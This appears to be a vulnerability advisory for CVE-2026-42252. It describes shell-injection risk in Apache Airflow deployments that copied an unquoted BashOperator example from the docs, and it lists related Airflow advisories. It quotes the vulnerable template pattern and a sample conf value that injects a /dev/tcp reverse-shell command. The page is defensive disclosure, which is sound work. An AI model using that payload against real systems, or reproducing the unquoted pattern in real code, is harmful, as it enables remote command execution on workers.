Skip to content
Apache AirflowGHSA-c85c-g9wv-pph2

Apache Airflow vulnerable to Improper Neutralization of Special Elements Used in a Template Engine

Critical9.1CVE-2026-42252 · Published Jun 1, 2026 · updated Jul 9, 2026

GitHub advisory

Affected versions

PackageAffectedFixed in
apache-airflow
PyPI
>= 3.0.0, < 3.2.23.2.2
Details and references

Apache Airflow's official documentation at `core-concepts/dag-run.html` ("Passing Parameters when triggering Dags") showed a verbatim `BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}")` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `"; bash -i >& /dev/tcp/.../9999 0>&1; #"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129 , the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release.

CVSS 3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Severity from
GitHub (reviewed advisory)
Weakness
CWE-1336
Also known as
BIT-airflow-2026-42252, CVE-2026-42252, PYSEC-2026-184

More Apache Airflow advisories

All Apache Airflow
DateAdvisory
Jun 1Apache Airflow: Incomplete redaction allowlist exposes secrets in Connection `extra` to read-permitted users
CVE-2026-45192Medium6.5fixed in 3.2.2
Jun 1Apache Airflow: Authenticated users can bypass the `is_safe_url` check
CVE-2026-40961High7.2fixed in 3.2.2
Jun 1Apache Airflow has a Link Following issue
CVE-2026-40861Medium6.5fixed in 3.2.2
Jun 1Apache Airflow has a Sensitive Cookie in HTTPS Session Without 'Secure' Attribute
CVE-2026-41017Medium5.9fixed in 3.2.2
Jun 1Apache Airflow has an Improper Authorization issue
CVE-2026-40963Low3.1fixed in 3.2.2
Jun 1Apache Airflow has a Missing Authorization issue
CVE-2026-41014Medium4.3fixed in 3.2.2

Critical advisories by email

Wednesdays: the week’s critical and high advisories in the AI and data stack, with the fixed versions. Only in weeks that have some.

Double opt-in. Unsubscribe any time.